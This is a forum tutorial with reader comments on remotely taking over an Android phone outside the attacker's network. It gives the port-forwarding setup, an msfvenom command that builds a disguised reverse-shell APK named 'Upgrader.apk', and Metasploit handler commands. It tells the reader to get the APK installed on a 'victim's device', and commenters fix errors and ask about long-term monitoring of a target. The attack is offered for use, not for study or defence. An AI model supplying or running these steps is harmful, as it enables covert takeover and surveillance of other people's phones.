Yo fellas! This is my first null byte writing,so any errors or mistakes regarding post are welcome.

I have seen in the post of HOW TO HACK ANDROID WITH KALI. But many people are facing problems on hacking the android which is not on the same network as of that of the attacker. So today i am gonna show you how to hack android with port forwarding with So lets get rollin'!!!

Step 1: Create Account in

First thing you want to dive in is create account. Go to and sign up

Click on register and you will get a verification link. Click on it and you created the account.

Step 2: Create Configurations

Now you will have an interface like this. Click on the configurations and then click on create new configurations.

Now, first will come name. Give any name you like. Then comes the type so we will chose OpenVpn(preinstalled in kali). Then atlast comes protocol,select TCP. Leave the comment box empty.

Then atlast you need to click on generate and you will have something like the above screen. Download and save the file. Also take a note of the commands that are written. For me its "openvpn --config hello1234.hello.ovpn". Dont forget to click on create at the end xD.

Then download the file and copy it to the desktop.

Step 3: Create Mapping Rules

Now go to mapping rules and create new rule

Just you need to write "4444" in port on pc. Its usually same in all pc. Click on create.

So we created our rule. We are almost done.

Step 4: Create Payload with Metasploit

Most of you would know how to create payload but just there are slight changes. You have to change the lhost and also the lport. So your lhost will be "" and your lport will be "58334".

msfvenom android/meterpreter/reverse_tcp LPORT=58334 R -o /root/Upgrader.apk

Step 5: Start the Port Forwarding

Now you need to start the port forwarding. Its damn easy, just copy the command then paste in terminal.

While making the configuration we had downloaded the config., so go to desktop and then run "openvpn --config hello1234.hello.ovpn". See the command will be different for you so dont ctrl+c and ctrl+v. Check the command then run it.

PS: I had to make a new account because of some issues. Hope you guys dont mind :D

Step 6: Ready to Exploit

This will be the final stage i think. Now follow me:

*use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost
set lport 4444
set ExitOnSession

Thats it. Now you have to install it in victim's device and boom!!
You hacked him out of the network.
Any problems are welcome in comment section :)

12 Responses

Port 4444 is not taking by website what are the other port which I can use for port forward

please do send me the screenshot of the problem you are facing

you can use 22/80/8080/443

Which link do we need to send out to victim phone? I'm confused

why is that showing error options while starting port forwarding ?
error message = Options error: In CMD-LINE:1: Error opening configuration file: 19lbtece02.hackwell.ovpn*

maybe because you're in user folder and the file is in desktop..?

every time that i see tutorial on port forwarding bros are creating backdoor and pipipi, but never using msf payloads where you don't set the ip or port, sadness

Handler failed to bind to - help me to solve the error
btw bigg fan of u i want u to make a contact with indian hac ker instagram--

bro reply me on instagram coz i cant access this account again

Hello friends so you also have this same problem

*but now i have solution for this problem how to fix it

First start the Openvpn and than when you connocted to openvpn

Open Treminal and type ifconfig than find the tun0 ip

tun0 ip showing when you connected to openVPN

but don't use this ip also in msfvenom when you creating the payload
in msfvenom you need to use your portmap link like this

after this open msfcosnole

use /exploit/multi/handler
set PAYLOAD: android/meterpreter/reverse_tcp
set LHOST tun0 #use this no need to inter ip there just use tun0
set LPORT #there use your listening port

use this may this will help you

Does this work with latest Android devices? Because the last time I tried, the app on my phone crashed saying 'This app was built for an older version of android' and I wasn't able to get any response on the multi-handler, due to this.

is this a permanent payload ?
mean one i created and inject it in targeted device now if i want to monitor after some weeks so it will work or not ?

Share Your Thoughts

  • Hot
  • Active